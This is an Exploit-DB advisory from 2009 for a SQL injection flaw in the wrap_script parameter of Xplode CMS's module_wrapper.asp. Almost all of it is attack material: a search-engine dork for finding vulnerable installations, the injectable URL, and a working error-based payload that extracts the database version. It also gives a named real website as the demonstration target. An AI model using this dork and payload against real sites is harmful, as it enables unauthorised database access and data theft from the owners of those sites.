Xplode CMS wrap_script Remote SQL Injection Vulnerability

2009-04-08T00:00:00
ID EDB-ID:8373
Type exploitdb
Reporter PLATEN
Modified 2009-04-08T00:00:00

Description

Xplode CMS (wrap_script) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            #---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms  
#
# Xplode SQL Injection Vulnerabilities
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com
#
# web: Www.ata-turk.tk & www.deltahacking.net
#
# big tnx: Dr.Trojan ~ Cru3l.b0y ~ b3hz4d  
#---------------------------------------------------------------------------------------------

dork: "Powered by Xplode CMS"

#----------------------------------------------------------------------------------------------

===[ SQL ]===


http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]

example & demo:

http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--


#----------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-08]